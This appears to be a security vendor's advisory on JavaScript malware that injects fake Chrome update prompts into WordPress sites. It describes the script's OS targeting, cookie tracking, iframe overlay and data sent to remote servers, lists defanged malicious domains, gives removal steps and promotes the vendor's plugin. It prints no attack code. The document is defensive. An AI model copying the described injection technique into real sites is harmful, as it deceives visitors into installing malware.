Introduction
A new wave of JavaScript malware is targeting WordPress websites, compromising their security and tricking visitors with convincing fake browser update prompts. This sophisticated infection displays a fake Chrome update page (like the one shown below), aiming to deceive users into downloading malicious files.
This article, prepared by the MoeSec Website Security team, will help you understand, identify, and remove this threat, as well as explain how MoeSec’s security solutions and free WordPress plugin can help you stay protected.
1. What Is This Malware?
A Targeted, Deceptive Attack
This JavaScript malware is far more than a simple nuisance:
- Selective Targeting:
It only activates for users on specific operating systems (Windows) and browsers (Chrome). - Fake Update Windows:
It injects a realistic-looking browser update prompt, urging users to “Update Chrome” via a button, Leading to malware downloads. - Session Control:
The script tracks visitors and limits how often the fake window is shown, making detection harder for website owners and stealthy as long time as possible.
Some malicious domains associated with this fake browser update campaign:
allupdateservices[.]com
dragonshop[.]cloud
statswpmy[.]com
wppanel[.]icu
updatechrome[.]shop
trackingmyadsas[.]com
and many other malicious domains and variants being discovered everyday!
2. How Does It Work?
Let’s decode the malware’s behavior:
- Checks Device and OS:
The script first verifies if the visitor is using Windows and is not on a mobile device. - Cookie-Based Tracking:
It counts how many times the user has seen the prompt, tracking visitors with cookies. - Injects Malicious Content:
For targeted users, it overlays the page with an iframe showing a fake Chrome update page (see screenshot above). - Data Exfiltration:
It sends user data (browser, OS, language, unique ID) to a remote server for tracking. - Limits Visibility:
Each user will see the prompt a limited number of times, reducing suspicion and detection.
3. What’s the Goal?
Deception and Infection:
The primary purpose is to trick users into downloading and running malware under the guise of a browser update. This can lead to:
- Ransomware or trojan infections
- Credential theft / infostealers
- Further compromise of the user’s system
Brand Damage & Blacklisting:
If your website is spreading fake updates, search engines and browsers may blacklist your domain, devastating your reputation and SEO.
4. How to Remove the Malware from Your WordPress Site
Step-by-Step Removal Guide
Back Up Your Website:
Always back up your files and database before making changes.Find the Malicious Code:
- Search your themes, plugins, and uploads for suspicious
<script>blocks, especially those referencing domains likeallupdateservices[.]comordragonshop[.]cloud. - Check files like
header.php,footer.php,functions.php, and any custom JavaScript files. - Search your database for the above domains or code as it’s usually injected in both files and database.
- Search your themes, plugins, and uploads for suspicious
Remove the Script:
- Delete all instances of the malicious JavaScript.
- Make sure to remove any associated iframes or suspicious code.
Update Everything:
- Immediately update WordPress core, all themes, and plugins.
- Remove any unused or suspicious plugins/themes.
Change Passwords:
- Update all admin, FTP, and database passwords.
- Update all admin, FTP, and database passwords.
Scan and Monitor:
- Use a trusted security plugin, such as the MoeSec Free WordPress Security Plugin, to scan for malware.
- Use a trusted security plugin, such as the MoeSec Free WordPress Security Plugin, to scan for malware.
Professional Help:
- For persistent or advanced infections, use the MoeSec Website Security Platform for quick removal and expert support.
5. How MoeSec Can Help
MoeSec Website Security Platform
Designed for complete website protection, MoeSec offers:
- Deep Malware Scanning:
Detects hidden scripts, backdoors, and known malware patterns. - Automated Cleanup:
Removes malware, including fake update scripts with a single click combined with unlimited manual cleanup requests & support by our certified security experts. - Real-Time Monitoring:
Detects suspicious changes instantly and alerts you. - Expert Remediation:
Certified security professionals are available for complex cases. - The platform also offers: Website Firewall, Backups, Trust Seal, Vulnerability Scanner and much more!
Why MoeSec?
The MoeSec platform is ideal for website owners who need comprehensive protection and fast incident response, far beyond what any free plugin can provide.
MoeSec Free WordPress Security Plugin
A robust, free plugin to harden your WordPress security:
- Scans for common malware and file changes
- Provides a security dashboard and alerts
- Offers hardening tips and easy fixes
- Offers Login protection, 2FA and burite force protection, Firewall, Backups, Integrity checks and much more!
Conclusion
If your website is showing fake browser update prompts, act now to protect your visitors and your reputation.
Install the MoeSec Free WordPress Security Plugin for essential protection, and consider the MoeSec Website Security Platform for professional security, monitoring, and malware removal.
Stay safe, don’t let your site be a conduit for the next wave of online scams! Visit MoeSec.com for more security tips and solutions.
